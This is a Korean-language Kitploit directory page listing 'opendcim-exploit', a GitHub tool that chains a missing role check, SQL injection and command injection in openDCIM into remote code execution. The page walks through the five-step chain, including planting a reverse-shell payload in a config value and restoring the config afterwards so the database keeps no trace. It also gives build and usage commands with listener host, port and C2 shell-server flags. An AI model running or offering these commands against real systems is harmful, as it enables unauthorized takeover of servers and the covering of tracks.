Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
opendcim-exploit — openDCIM install.php SQLi에서 RCE로 이어지는 체인 (CWE-862 + CWE-89 + CWE-78) | Kitploit
도구/GitHubGitHub/chocapikk/opendcim-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubchocapikk/opendcim-exploit

opendcim-exploit

openDCIM install.php SQLi에서 RCE로 이어지는 체인 (CWE-862 + CWE-89 + CWE-78)

저장소 보기
525개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

openDCIM - 구성 오염을 통한 SQLi에서 RCE까지

openDCIM의 install.php LDAP 구성 폼을 대상으로 한 원격 코드 실행 체인입니다. VulnCheck go-exploit 프레임워크를 기반으로 구축되었습니다.

취약점 체인

#CVECWE설명
1CVE-2026-28515CWE-862install.php는 LDAP 구성 폼 앞에서 역할 검사를 수행하지 않습니다. 모든 사용자가 접근할 수 있습니다.
2CVE-2026-28516CWE-89Config::UpdateParameter()는 문자열 보간과 PDO+MySQL을 통한 스택 쿼리를 사용합니다.
3CVE-2026-28517CWE-78report_network_map.php는 dot 구성 값을 exec()에 직접 전달합니다.

영향받는 버전: 모든 버전 (최신 커밋 4467e9c4에서 테스트됨)

작동 원리

  1. install.php에 POST - LDAP 폼을 통한 SQL 주입으로 구성을 백업하고 dot을 명령 페이로드로 덮어씁니다.
  2. report_network_map.php에 GET - exec()를 트리거하고 id 출력으로 RCE를 확인합니다.
  3. install.php에 POST - dot을 리버스 셸 페이로드로 덮어씁니다.
  4. report_network_map.php에 GET - 리버스 셸을 트리거합니다.
  5. install.php에 POST - 백업 테이블에서 모든 원래 구성 값을 복원합니다.

익스플로잇 후 데이터베이스에 흔적이 전혀 남지 않습니다.

빌드

root@kitploit:~
go build -o opendcim-exploit .

사용법

Docker 배포 (인증 없음)

root@kitploit:~
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

htpasswd 배포 (유효한 사용자)

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

플래그

도구 다운로드
플래그기본값설명
-rhost대상 호스트
-rport80대상 포트
-sslfalseHTTPS 사용
-lhost리스너 호스트 (리버스 셸용)
-lport리스너 포트 (리버스 셸용)
-c2C2 유형: SimpleShellServer 또는 SSLShellServer
-usernameHTTP 기본 인증 사용자 이름 (SetEnv 배포에서는 생략)
-passwordHTTP 기본 인증 비밀번호 (SetEnv 배포에서는 생략)
-a자산 탐지 (대상이 공격 가능한지 확인)
-e익스플로잇 모드